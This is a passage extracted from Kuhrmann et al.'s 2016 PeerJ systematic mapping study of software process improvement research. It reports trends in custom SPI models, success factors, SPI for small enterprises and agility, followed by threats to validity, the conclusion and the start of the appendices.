0 2 2 0 4 1 0 4 1 2 3 4 5 1 0 3 2 0 Embedded6Systems 29 0 0 0 0 0 1 1 1 1 2 2 3 1 1 0 1 1 0 1 0 2 2 1 0 3 5 0 Telecommunications 23 0 0 0 0 0 1 0 1 0 1 0 4 3 2 2 2 1 0 1 2 1 1 1 0 0 0 0 Medical6Devices 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 2 5 2 0 Automotive 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 1 3 2 0 0 1 2 3 0 MissionNcritical6Defense 8 0 0 0 0 0 0 0 0 0 1 1 2 0 0 1 1 0 0 0 1 1 0 0 0 0 0 0 Business6IS 9 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 1 0 1 1 1 0 0 2 0 1 Web/Mobile/Cloud 11 0 0 0 0 0 0 0 0 0 0 1 0 1 1 0 0 1 0 1 0 0 1 1 2 0 2 0 Skills6and6Education 17 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 2 0 1 1 4 0 2 2 0 1 3 0 A p p li c a ti o n 6D o m a in D im en si on :7P ro ce ss D im en si on :7C on te xt P u b li c a ti o n 6O b je c ti v e A s s e s s m e n t6 a n d 6A s s .6 M o d e ls ( Q u a s iN ) 6S ta n d a r d s 6( a n d 6 T e c h n iq u e s ) D im en si on :7S tu dy 7 Ty pe 7a nd 7M et ho d L if e 6C y c le 6P h a s e s C o m p a n y 6 S iz e 6a n d 6 S c a le Figure 7 Overview of the different metadata attributes addressed over time. The darker the color, the more papers in a year have this attribute as- signed, whereas a paper can have multiple attributes assigned. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 15/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 by ISO/IEC 15504, which is assigned to 94 papers. Beyond the common standards, 196 papers are devoted to measurement in general. A more detailed discussion on the standard approaches CMMI and ISO/IEC 15504 can be found in ‘New and customized SPI models’. Regarding the (quasi-)standards (and techniques), the overall result set indicates these aspects considered of low relevance for the community. Most frequently mentioned are Six Sigma, Continuous Improvement, and PSP/TSP (each with less than 20 mentions). Not yet clear is the relevance of standards like ISO/IEC 29110—we see some mentions, but there is some movement and continuous development of such standards. Therefore, a trend analysis is yet not meaningfully to conduct. In the publication objective category, we analyzed the major research directive of a publication. Figure 7 shows four attributes in the spotlight: A considerable share of the papers (295 out of 769) deals with custom or new models, and the data shows the number of custom/new models continuously increasing. This trend, which was already found in the initial study, is discussed (together with the use of standard approaches) in ‘New and customized SPI models’. Furthermore, 232 papers cover general improvement as a trend. Additionally, the result set contains 126 papers addressing SPI success factors with an increasing interest over the years. In ‘SPI success factors,’ we provide more details on this topic. Finally, with 73 mentions, agile and lean development constitutes the fourth trend with increasing number of publications. We provide details in ‘SPI and agility’. Dimension: study type and method. Within the six different attributes defined for this di- mension, Fig. 7 shows single and multiple/longitudinal case studies the major instruments, followed by survey research and interview studies. However, as these instruments are often combined, i.e., in many case studies, data collection is carried out using interviews. Although the result shows so-called mixed method approaches applied to SPI research, still, single case studies (quite often carried out with students in lab environments) account for the majority of the selected research methods. Nevertheless, in recent years, an increasing number of secondary studies (i.e., systematic reviews and mapping studies) could be found. This indicates the community starting to systematize and categorize SPI knowledge. The result set clearly shows the research field lacking replication studies. Dimension: context. Within the dimension Context, we defined the three categories Life Cycle Phase, Company Size and Scale, and Application Domain, which provide the following insights: Regarding the life cycle phases, project management (92 mentions) and quality manage- ment (71 mentions) are in the spotlight (continuously covered and without specific peaks). They are followed by requirements engineering (41 mentions) and testing (36 mentions), whereas testing as topic is often combined with (general) quality management. Architecture and design as well as implementation received few mentions (less than 20 each). The companies sizes and scales addressed in the papers show a trend towards very small entities (VSE) and small-to-medium-sized enterprises (SME). In the result set, 116 papers deal with companies of this sort, while 75 papers address companies of other scales, i.e., large companies and global players. In ‘SPI for SMEs’, we investigate this attribute group in more detail. Furthermore, global distribution of software development is addressed Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 16/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 by 37 papers, whereas this is a cross-cutting concern that is addressed by companies of all sorts. Considering the different application domains, the largest share of papers deals with embedded systems in general (29 mentions) or specific embedded domains such as medical devices, automotive software, or mission-critical and defense systems (less mentioned specific embedded domains are classified under general). The application domain of telecommunication systems is mentioned 23 times. We also consider the 17 papers addressing skills and education, e.g., by describing industrial training programs or university courses, as application domain. Summary. Figure 7 presents an overview of the metadata attributes assigned to the 769 papers from the result set. The figure shows the major trends that we already observed in our initial study (Kuhrmann et al., 2015): SPI-related research has a strong focus on custom/new models and success factors, standard assessment/maturity models like CMMI or ISO/IEC 15504 are well-researched, and SPI in the context of VSEs/SMEs and agile and lean software development as part of SPI have to be considered major trends. The set of metadata attributes defined for this study provides further insights: for instance, major fields of interest in SPI research are project management and quality management (often in combination with testing), and SPI is relevant to all application domains and to all company sizes (which confirms Horvat, Rozman & Györkös, 2000). However, we also have to mention that due to the nature of this study, we were so far not able to assign attributes for all dimensions to all papers. Only 232 papers (30%) were assigned to attributes covering all three dimensions, 389 papers (51%) cover two dimensions, and 148 (19%) have attributes in only one dimension. Therefore, the presented overview does not yet provide a complete picture, and we discuss this threat to validity in ‘Threats to validity’. RQ 3: trends in SPI-related research Our initial study Kuhrmann et al. (2015), inter alia, had the purpose to reveal trends in SPI-related research to identify those fields that have reached a certain saturation and those that either require more attention or reflect a particular problem-driven need. The initial results pointed to trends or streams worth further inspection: (new) SPI models, SPI success factors, SPI in small-to-medium-sized enterprises (SME), and agility as SPI. In subsequent sections, we primarily focus on these trends/streams, before discussing further observations. New and customized SPI models In the field of SPI, existing (standard) models are customized or completely new models are proposed. This trend can be observed now for years, as Fig. 8 illustrates. Starting from the very beginning on, new or customized models are proposed every year. In total, the result lists 295 out of 769 papers (approx. 38%) with this purpose. As shown in Fig. 2, in the present study, we collected metadata regarding different (quasi-) standard and well-disseminated approaches. In the following, we provide a detailed analysis on the share of customized and new models, and we analyze how these approaches are integrated with each other and what their scientific maturity is. Figure 9 shows a systematic map that illustrates two aspects: in lower part the research maturity and the contribution of papers addressing standard maturity models is shown. In total, 225 out Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 17/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 8 Trend chart of the share of papers that present customized and/or new SPI models. of 769 papers address CMMI, ISO/IEC 15504 or both. The classification according to the research- and contribution type facet shows that for standards and standard-related SPI research many lessons learned are reported and that some evaluation research is available. From those 225 papers addressing standard approaches, 74 deal with developing customized SPI models, which are grounded in these standards. Whether a custom/new SPI model is based on one of the standards is visualized in the upper part of Fig. 9. From the 295 papers proposing custom/new SPI models, 74 are based on the standard models, i.e., 221 papers do not ground their contribution in standards and use other practices. In particular, four papers mentioned to reuse/extend Six Sigma, eight reused/extended the Continuos Improvement principle, three papers refer to PSP/TSP, and one paper refers to COMPETISOFT. Moreover, Fig. 9 shows that the result set contains 187 solution proposals, but only 76 papers that are categorized as evaluation research or experience paper. Among the 295 papers, 54 (18.3%) explicitly mention to cover SPI for SMEs (see also ‘SPI for SMEs’) with a focus on improving the project management (four papers) and general quality management processes (three papers). The processes associated with the different life cycle phases (Fig. 2) are represented as follows: 36 (12.2%) papers aim at improving the general quality management, 35 (11.9%) address project management, and 19 (6.4%) aim to improve the test process. That is, the focus of the custom/new SPI models is on quality management and testing (18.6% in total). Summary. The trend observed in our initial study could be confirmed: 295 out of 769 papers propose custom or new SPI approaches, which makes in average 11 new SPI models published per year. Only 74 out of these 295 papers ground their contribution in a standard approach, whereas the majority (approx. 75%) of the solution proposals does not explicitly rely on standardized approaches. Furthermore, the result set shows that the majority of the papers proposing entire SPI methods or frameworks of which few are evaluated (the majority are solution proposals). Moreover, the result set shows few models or theories on SPI among the proposed solutions. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 18/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 9 Overview of the classification of publications addressing the standard approaches CMMI and ISO/IEC 15504 (n = 225), and their rela- tion to custom/new models (n = 295). SPI success factors Figure 10 visualizes the second trend observed: the quest for SPI success factors. In the result set, 126 out of 769 papers (approx. 16.4%) are devoted to success factors. The figure shows this quest starting in the mid 1990s, and an increasing interest starting around 2007. In the following, we provide an overview how success factors are collected, studied, applied, and evaluated. The first questions of interest address the origin and maturity of the success factors, i.e., their general reliability. For this, we analyzed the research- and contribution type facets of the papers containing the success factors. Figure 11 provides this categorization and shows that 72 of the 126 papers (57.1%) are classified as philosophical papers, i.e., papers that are either a secondary study or that provide a discussion-based research approach. However, 33 papers (26.2%) derive their success factors either from evaluation research or experience reports. Furthermore, for 73 papers (57.9%), success factors are contributed Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 19/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 10 Trend chart of the share of papers that investigate success factors in SPI. Figure 11 Summary of papers addressing success factors in SPI categorized according the research- and contribution type facets. as lessons learned; 27 papers (21.4%) structure and integrate success factors in frameworks, and 14 papers (11.1%) use success factors to develop a model or a theory. Figure 11 suggests success factors mainly crafted from secondary studies and discussion. In order to provide more insight, we used the Study Type and Method dimension to study the research approaches chosen for the collection of success factors. Figure 12 provides the summary of the chosen research methods. The figure shows survey/interview and case study research being the preferred methods. Only 18 out of 126 papers rely on secondary studies (systematic reviews and mapping studies), and only four papers use a multi-method research approach (either survey with case study research, or a secondary study combined with survey research and grounded theory). For 5 papers, an explicitly mentioned research approach could not be found in the abstract-based analysis. Figure 12 also shows that only 27 papers (21 multi-case/longitudinal study, 2 replication study, and 4 multi-method) go beyond ‘‘one-time research’’, i.e., these papers study success factors over time, from different angles, and/or apply them and learn from the application. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 20/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 12 Summary of the research methods applied to study SPI success factors. Figure 13 Trend chart of the share of papers SPI in the context of SMEs. Summary. The second trend observed in our initial study could be confirmed: 126 out of 769 are devoted to the collection and study of success factors. The majority of the papers is classified as philosophical papers, i.e., these papers report secondary studies or discussion- based studies, and most of the papers present success factors as lessons learned. However, the data also indicates success factors being crafted from limited research in terms of long-term observation or evaluation from different angles. Only 27 papers mention a respective research approach. Furthermore, 18 out of 126 papers are categorized as secondary studies, i.e., there is an observable trend to foster information collection and aggregation. SPI for SMEs The third trend observed in the initial study was an increasing interest in SPI for small-to- medium-sized enterprises (SME). Figure 13 provides an overview of the share of papers explicitly addressing SPI in SMEs (and other company sizes if mentioned in title, keywords, or abstracts). The figure shows a first ‘‘peak’’ from 1996-2002 (matching the ‘‘dot-com’’ phase), and then a growing interest starting again in 2007 continuing till now. In total 186 out of 769 papers explicitly mentioned the company size in the context attributes of which 116 papers (15.1%) mention SMEs (or VSEs), and another 75 papers (9.8%) mention other company sizes; one paper addresses companies regardless of their size. Cross-cutting the company size, the metadata also contains an attribute for Global Software Engineering (GSE), i.e., if SPI takes place in a global setting. A total of 37 papers address GSE-related questions. In Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 21/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 14 Overview of the classification of publications addressing SPI in small and very small companies, and SPI in other company sizes (n = 186). the following, we provide some insights regarding the topics SPI for SMEs addresses and we also provide an overview of the respective application domains and covered life cycle phases. Figure 14 provides a systematic map of the papers that explicitly mention the company context. The figure shows the classification according to the research- and contribution type facet. Regarding the research type facet, Fig. 14 shows a fairly balanced picture, i.e., we find solution proposals, philosophical papers, evaluation research, and experience papers. Regarding the contribution type facet, papers mostly provide frameworks and lessons learned. However, for VSEs and SMEs, three papers develop models on SPI for SMEs, two papers develop theories on SPI for SMEs, and nine papers also address tools in the context of SPI for SMEs. The get more insights, we filtered the metadata for the company size. The results are illustrated in Tables 6–8. Table 6 shows that most of the VSE/SME-related papers emerge from the domain of web, mobile, and Cloud-based software development. Companies categorized as ‘‘other,’’ i.e., large companies and global players, mostly contribute to the body of knowledge from embedded systems and telecommunication. Regarding the respective publication objectives, Table 7, again, shows the trend to contribute custom/new SPI models—especially for the VSE/SME context (cf. ‘New and customized SPI models’), and to collect success factors (cf. ‘SPI success factors’). Table 7 also shows the interest into agile and lean approaches in the context of SPI. As already mentioned in ‘New and customized SPI models’, a certain trend shows a particular focus on improving project- and quality management. Table 8 reflects this trend also for the company-size context, whereas large companies and global players seemingly address a broader spectrum of life cycle phases. Summary. Among the 769 papers from the result set, 186 explicitly mention the company size as context attribute. In total, 116 papers explicitly mention small and very small companies as research context. Almost half of the papers (54 papers) address custom/new SPI models, which confirms the previously observed trend. In the present result set, we Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 22/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 6 Overview of SPI application domains. Application domain V/SME Other Embedded system 1 9 Telecommunication 0 16 Medical devices 0 0 Automotive 2 1 Mission-critical defense 1 4 Business IS 1 4 Web/Mobile/Cloud 8 1 Skills and education 1 1 Table 7 Overview of publication objectives. Publication objective V/SME Other Agile/Lean 9 7 Process simulation 0 1 Process Line/Patterns 1 2 Product Line/Management 1 1 Success factors 21 8 Custom model 54 23 General improvement 29 28 Table 8 Overview of addressed life cycle phases. Life cycle phase V/SME Other Project management 13 10 Quality management 6 7 Requirements engineering 1 6 Architecture 3 4 Implementation 2 2 Test 1 4 find a growing interest in SPI for SME, which is also supported by the recently published standard ISO/IEC 29110 that explicitly addresses SPI for small and very small companies (six papers already refer to this new standard). SPI and agility Finally, Fig. 15 visualizes the fourth trend found in the initial study: although perceived as contradiction, in recent years, combining agility and SPI received some attention, such as agile maturity models. In total, the result set contains 73 papers (9.5%) that address agility in the context of SPI, and the Fig. 15 shows first contributions on this topic just around the Agile Manifesto’s publication. However, the ‘‘real’’ interest started around 2008, similar to Salo & Abrahamsson (2007), when the number of studies dealing with agility and SPI started to increase. Figure 16 shows the big picture by visualizing the research- and contribution type facets of the papers on agility and SPI. The figure shows a balanced research, i.e., the Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 23/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Figure 15 Trend chart of the share of papers that investigate the application of agility in SPI. Figure 16 Overview of the classification of publications addressing agility and SPI (n = 73). result set contains solution proposals as well as evaluation research and experience reports, and philosophical papers discussing agility and SPI (only two of the philosophical papers are secondary studies). The majority of the 73 papers contributes lessons learned (from applying agile in SPI or related activities) and frameworks. Analyzing the 73 papers for the collected metadata, 20 papers discuss agility in the context of the standard SPI models, i.e., CMMI and ISO/IEC 15504. Furthermore, 22 papers propose custom SPI models of which six papers ground their proposal in CMMI and three papers in ISO/IEC 15504. 16 papers discuss success factors associated with agility and SPI, whereas only one paper develops a model on success factors while of the remaining papers 12 report lessons learned only. Regarding the company size, nine papers explicitly mention VSEs and SMEs as research context and seven papers address other company sizes (mostly in the embedded systems and telecommunication application domain). Furthermore, five papers discuss agility in a Global Software Engineering context (three of them in the context large companies). Finally, regarding the covered life cycle phases, six papers aim to improve the project management and nine papers address quality management and software test. Summary. Among the 769 papers from the result set, 73 deal with agility and SPI. These papers address a variety of topics showing agility considered relevant for many aspects of software and system development thus becoming interesting for SPI, too. The majority of the classified papers deals with agility as concept to improve processes. However, the result set also contains papers adapting agility for SPI as such, like agile maturity models Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 24/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 (e.g., Schweigert et al., 2013) or concepts to justify agility and standard SPI models. The result set also shows that agility is not for V/SMEs only, but also large companies and even global players have a growing interest into agility. Discussion In this section, we discuss the findings obtained so far. Beyond the discussion of the trends already identified in our initial study, we also broaden our perspective and discuss further trends that can be found in the updated result set. Further insights in SPI research. Beyond the aforementioned major trends, the updated study (including the updated data analysis procedures) reveals more insights but few further trends. At first, the study confirms the statement by Horvat, Rozman & Györkös (2000) that SPI is important for all companies regardless of their size, and, we can add, also regardless of their application domain. Rationale for this growing interest can be found in new technologies and markets (see also attribute GSE in Fig. 7), and in the evolution of software development methods. For instance, several studies like the ‘‘State of Agile Survey’’ (VersionOne, 2006–2014) show a growing interest in agile and lean approaches and, at the same time, Vijayasarathy & Butler (2015) and Theocharis et al. (2015) study how this trend is manifested in the companies’ process use. Especially Theocharis et al. (2015) mention hybrid software processes (or the ‘‘Water-Scrum-Fall’’ as named by West, 2011) as standard approach. Yet, so far, little is known about the (systematic) development of such hybrid processes. This can be considered one reason for the growing interest in SPI: companies want/have to adopt agile/lean approaches (e.g., Diebold et al., 2015), but they also have to comply with external norms and standards (e.g., in the domain of safety-critical systems), which we consider a main driver behind SPI initiatives. Another perspective is given by VSEs and SMEs that also have a growing interest in SPI. However, for companies of this size, standard approaches, such as CMMI or ISO/IEC 15504 are often inappropriate (see for instance Staples et al., 2007). At this scale, agile/lean is important as well as context-specific SPI approaches, which can be considered an explanation for the significant number of custom/new SPI models (‘New and customized SPI models’) such as LAPPI (Raninen et al., 2012) or tailored standards, such as ISO/IEC 29110 (Laporte & O’Connor, 2014). Another finding of the study is a strong focus on project management and quality management (often together with testing) in SPI. SPI is, usually, a management-driven endeavor. As argued in Theocharis et al. (2015), managers want to have their ‘‘safe’’ and measurable environment, while developers prefer slim and agile development approaches (see also Murphy et al. (2013); Tripp & Armstrong (2014)). This line of argumentation provides rationale for two observations from this study: first, there is a continuous effort in studying measurement in general and, second, the growing interest in agile/lean approaches. Both together lead to a number of the aforementioned hybrid software processes and also to context-specific SPI approaches that—all together—provide an explanation for the strong focus on project- and (general) quality management. Regarding the remaining life cycle phases, requirements engineering and software test are the most frequently researched topics in SPI. However, the high number of testing-related papers (compared to the implementation-related papers) motivates the question for why this rather ‘‘late’’ Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 25/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 phase is more emphasized, especially in times of agile/lean software development. Is testing addressing implementation as well? Is testing subject to improvement because of the effort spent on this activity? However, these are questions that cannot be answered in the current stage of the study thus remain subject to future work (see also ‘Conclusion & Future Work’). What is the state of SPI after all? Our data shows a diverse picture and, furthermore, shows SPI a frequently researched topic (Fig. 3). Moreover, research on SPI addresses a variety of aspects with certain focus points: The majority of the investigated publications focuses on proposing custom/new frameworks and on reporting lessons learned. Furthermore, our results show a significant imbalance between proposing new solutions and evaluating their feasibility—especially in the long run. The majority of evaluation research is conducted in the context of standardized SPI- and maturity models (Fig. 9). For newly proposed models, we often find—if at all—only single-case validation (in industry or university-hosted labs); only few, e.g., Raninen et al. (2012) provide a comprehensive evaluation. Another finding is the lack of theorizing approaches, which are often performed for specific domains (e.g., SMEs) or grounded in secondary studies only. In summary, although SPI is around for decades, we still miss a sound theory about SPI. We have a number of standardized and specific SPI models and frameworks. However, we still lack evidence. One reason could be that SPI always involves change in behavior of individual persons and changes in the culture of an organization. Due to the varying contexts, SPI cannot be too descriptive. Therefore, frameworks and tools are proposed for adaptation to the respective context. This would also provide an explanation for the effort spent to study SPI success factors (‘SPI success factors’), which can be considered an early step towards crafting a more general and context-agnostic theory on SPI. Yet, the constant change or evolution of the context could be considered a continuous stimulus to provide new frameworks that only have a short life cycle and are quickly replaced by other frameworks that aim to ‘‘better’’ solve a particular issue. This assumption is supported by the missing long-term and replication studies (the result set only contains 2 explicitly mentioned replication studies). Yet, this constant change could also put all attempts to standardize SPI at stake. As for instance Vijayasarathy & Butler (2015) and Theocharis et al. (2015) have shown, companies utilize highly customized and specific processes, and the aforementioned diversity could end up in a situation in which every organization implements its own ‘‘home-grown’’ SPI approach, leaving only non-binding initiatives, such as the SPI Manifest (Pries-Heje & Johansen, 2010) as least common denominator. Furthermore, missing is a critical discussion and comparison of available approaches, and their use and feasibility in practice. Although we found 55 secondary studies, these studies lay their focus on investigating success factors rather than providing structure and trying to generalize available knowledge, as for instance done by Unterkalmsteiner et al. (2012). However, in our study, we found more than 200 papers addressing standard SPI approaches, 295 papers presenting/discussing custom/new models, and we also found 126 papers explicitly devoted to SPI success factors. All together, these papers provide a rich ground to conduct research on the evolution of SPI models, which would help studying the actual essence of SPI models, factors that positively/negatively influence the success of Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 26/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 SPI programs. In a nutshell, our results show that SPI is a still emerging field characterized by solution proposals and experiences awaiting more effort to systematization. Threats to validity In this section, we evaluate our findings and critically review our study regarding its threats to validity. As a literature study, this study suffers from potential incompleteness of the search results and a general publication bias, i.e., positive results are more likely published than failed attempts. For instance, the result set does not contain studies that explicitly report on failure and draw their conclusions from respective lessons learned, and we thus cannot analyze proposals to answer the question for: What works and what does not? That is, our study encounters the risk to draw an incomplete and potentially too positive picture. Internal validity. Beyond the aforementioned more general threat, the internal validity of the study could be biased by personal ratings of the participating researchers. To address this risk, we continued our study Kuhrmann et al. (2015), which follows a proven procedure Kuhrmann, Fernández & Tiessler (2014) that utilizes different supporting tools and researcher triangulation to support dataset cleaning, study selection, and classification. Furthermore, due to the inappropriateness of the focus type facet as classification schema in this stage of the study (as already discussed in Kuhrmann et al., 2015), we addressed this threat to validity by relying on a new, more flexible set of metadata (‘Analysis and classification’). This new instrument addresses the previously found issues, namely (general) disagreement on the categorization, and lacking precision and demand for multiple assignments respectively. However, although the issues with the focus type facet were solved, the metadata schema introduces potentially new threats. For instance, due to the nature of the study, we cannot ensure to have a full set of metadata for every paper (as already mentioned in ‘RQ 2: result set contribution’, only 30% of the papers have attributes from all three metadata dimensions assigned and, still, we cannot ensure to have captured all metadata). Furthermore, the metadata collected so far needs to be considered initial, as there are potentially more attributes of interest. That is, since we rely on the mapping study instrument in the first place, some metadata might yet not be captured, as this would require a more in-depth analysis, e.g., using the systematic review instrument. Furthermore, as we introduced 40 metadata attributes, the risk of misclassification increases, e.g., due to misunderstandings regarding the criteria to be applied or due to confusing/misleading use of terminology in respective papers. External validity. The external validity is threatened by missing knowledge about the generalizability of the results. However, as we focused on a broadband analysis accepting a large number of publications, we assume to have created a generalizable result set. Furthermore, due to an extra quality assurance and trend analysis of the two result sets (initial study and study update) and the integrated result set, in ‘Result overview’, we could observe a manifesting trend (see Figs. 3–5). Yet, this assumption needs to be confirmed by further independently conducted studies. Also, the external validity can be threatened by the modified data collection procedure (Appendix ‘Data collection in the study update’), which includes a potential limitation of the update chunks to be added. However, the Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 27/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 aforementioned quality assurance and trend analysis procedures did not show a significant impact on the trends of the distribution of the papers in the result sets. Nevertheless, to increase the external validity, further update and/or replication studies are required to confirm our findings. With the study at hand, we lay the foundation for such research by providing an actionable update procedure (Appendix ‘Search and cleaning procedure’) that can be implemented by further researchers. Furthermore, as already mentioned in the discussion on the internal validity, generalizability is also affected by potential white spots in the metadata attributes, which, however, requires further investigation. Such (independently conducted) investigation will (i) contribute to the internal validity by increasing dataset completeness, but (ii) will also improve the external validity by incrementally improving the quality of the dataset used to draw general conclusions. CONCLUSION & FUTURE WORK In this article, we presented a substantially updated systematic mapping study on the general state of the art in Software Process Improvement (SPI). The present work continues our long-term study of which we published initial results in Kuhrmann et al. (2015), and (i) evolves the dataset and the precision of the data analysis and (ii) introduces an improved data collection instrument to serve further studies of the field. To analyze the data obtained from automatic searches, we rely on the research type facet by Wieringa et al. (2005) and the contribution type facet by Shaw (2003) as standard classification schemas. Furthermore, to get deeper insights, we defined 40 metadata attributes. In total, our study results in 769 papers that allow for a long-term analysis of the development of SPI, and that allow for determining research hot-spots and (general) trends. In particular and based on Kuhrmann et al. (2015), our study investigates previously observed trends: a constant publication rate of custom/new SPI models, a huge interest into studying SPI success factors, and an increasing interest in studying SPI in the context of (very) small enterprises and in adopting agile principles and practices to SPI. Among other things, 295 papers (38%) of the papers propose/discuss custom or new SPI approaches (ranging from fully-fledged models to specific fine-grained methods). From these 295 papers, 74 ground their contribution in standard models, such as CMMI or ISO/IEC 15504, whereas the majority of the papers is based other practices or none of the available approaches. The majority of the custom/new models covers self-contained SPI approaches, which are, however, scarcely evaluated in a broader context (the most frequently used instrument to conduct SPI research is the single-case study). Moreover, the publication pool is focused on solution proposals, yet lacking theories or models of SPI. Regarding the second trend, 126 papers (16.4%) were identified contributing SPI success factors. The investigation of how the success factors were distilled showed an increasing trend towards secondary studies. That is, although most of the contributing papers report on rather short-term studies or studies carried out in a university lab (only 27 papers mention a mixed-method or long-term research approach to investigate and evaluate success factors), there is an observable trend to foster information collection and structuring. The third trend Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 28/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 is the increasing interest into SPI in the context of VSEs and SMEs. In the result set, 116 papers (15.1%) explicitly address companies of this size of which about the half (54 papers) addresses custom/new SPI approaches tailored to this particular context. Yet, the result set also shows new standards that address this context (e.g., the ISO/IEC 29110) represented in the study. The last trend studied addresses agility and SPI. The result set mentions 73 papers (9.5%) mostly using agility as a concept to improve established processes, but the result set also lists agile maturity models or further concepts to justify agility and standard SPI models. The result set also shows that agility is not for VSEs/SMEs only, but also large companies and even global players, e.g., from the domain of telecommunications, show a growing interest into agility. Finally, going beyond the aforementioned general trends, inspecting the result set shows SPI mostly addressing project management and quality management (including measurement), and the result set shows the growing interest into agile/lean approaches. Impact. Summarizing, our study provides a big picture illustrating the development of the field SPI over more than 25 years. Our results show a diverse picture, which is shaped by a constant publication rate of about 11 SPI solution proposals per annum, and a large share of papers reporting lessons learned. However, our study also shows an imbalance in the publication pool: there are many solution proposals but few are rigorously evaluated. Furthermore, although SPI as a field addresses a variety of topics, on the one hand, our study shows several research hotspots but, on the other hand, we could also identify ‘‘under-researched’’ topics, such as sound theories and models on SPI. Therefore, our study has some impact on research as well as on practice. From the practitioner perspective, by using the categorized data, our study helps practitioners better characterize an actual/planned SPI endeavor and to find proper approaches and experiences straight forward and thus helps avoiding errors already made before or re-inventing the wheel. For researchers, our study provides rich ground to conduct further research, e.g., by highlighting the white spots that need further investigation or by naming those fields that already accumulated a certain amount of data thus enabling researchers to conduct replication research. Limitations. Although being a long-term endeavor aggregating much knowledge, our study has some limitations. In particular, due to the overall goal of creating the big picture, our study suffers from the mapping study instrument applied. As a mapping study, our study suffers from missing details and, therefore (as discussed in the threats to validity), bears the risk of incomplete or even incorrect data classification. However, to overcome this major limitation, further (independently conducted) research is required to incrementally improve the data. Furthermore, the present study is conducted from the perspective of ‘‘pure’’ SPI. That is, (very) specific SPI approaches in specific domains might not be triggered by the study design. To overcome this limitation, again, further complementing research is required to improve the data quality. Future work. Addressing the aforementioned limitations of the present study, future work comprises a collection of fine-grained studies for selected aspects. In particular, the study presented here serves as a scoping study to identify certain hotspots, trends, or streams Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 29/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 worth further investigation. Based on those hotspots, we form data subsets, which we analyze using the systematic review instrument (instead of the mapping study instrument) to conduct in-depth analyses. Currently, we called in further external researchers to strengthen the team and to carry out the following in-depth studies on SPI in the field of Global Software Engineering (GSE; Kuhrmann et al., in press), SPI in the context of software quality management and testing, agility and SPI, and SPI barriers and success factors. Conducting these studies helps rounding out the big picture and, moreover, to get more details and insights on specific topics of interest. Furthermore, by applying the systematic review instrument, we directly address the aforementioned limitation and incrementally improve the data quality. In further iterations of the main study, such improved data is going to be integrated with the main study thus aiding the general improvement of the data and analyses presented here. As the present study is also designed to serve as a continuous measurement of SPI’s heartbeat, the next update of the mapping study (including all detailed data obtained by then) is planned for 2017. ACKNOWLEDGEMENTS Conducting such a study is a long-term endeavor that so far involved many people. We thank Michaela Tießler, Ragna Steenweg, Daniel Méndez Fernández for their support in the early stages of this study, in particular in testing the instruments for paper selection and dataset cleaning. Furthermore, we owe special thanks to the students of the ‘‘Hiwi-Pool’’ of the Technische Universität München, who supported us during the initial data collection and dataset completion and cleaning processes, and we also owe special thanks to Claudia Konopka and Peter Nellemann, who substantially supported the initial data analysis and reporting. Furthermore, we thank the reviewers and participants of the International Conference on Software and Systems Process (ICSSP) 2015 for their valuable comments and the inspiring discussion on the initial study results. APPENDIX A. INITIAL STUDY POPULATION In the initial study, based on the data collection procedures (described in Appendix ‘Data collection in the initial study’) and the study selection procedures (described in ‘Research Design’), we obtained the result set described in Table 9. This dataset is the foundation for Kuhrmann et al. (2015), and this result set also lays the foundation for the study update presented in this paper. APPENDIX B. DATA COLLECTION PROCEDURES The presented study lays the foundation for a continuous study of the research field of Software Process Improvement (SPI). In order to support this long-term study, an efficient study update procedure is an imperative, which mainly affects the data collection procedures. Therefore, in this appendix, we give an integrated and detailed view on the data collection procedure as executed in the initial study, and we detail the update procedure used for compiling the report at hand. Kuhrmann et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.62 30/38 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.62 Table 9 Data collection and filtering results (tentative result sets during selection and final result set). Step IEEE ACM Springer Elsevier Wiley IET Total Step 1: Search (‘Query construction’) S1and (C1orC2) 71 543 306 991 1,185 89 3,185 S2 and (C1 or C2) 68 539 306 989 1,133 89 3,124 S3 and (C1 or C2) 1,310 2,341 1,032 2,675 16,113 726 24,197 S4 and (C1 or C2) 130 925 438 945 2,480 479 5,397 S5 and (C1 or C2) 1,585 2,459 1,038 2,731 17,184 822 25,819 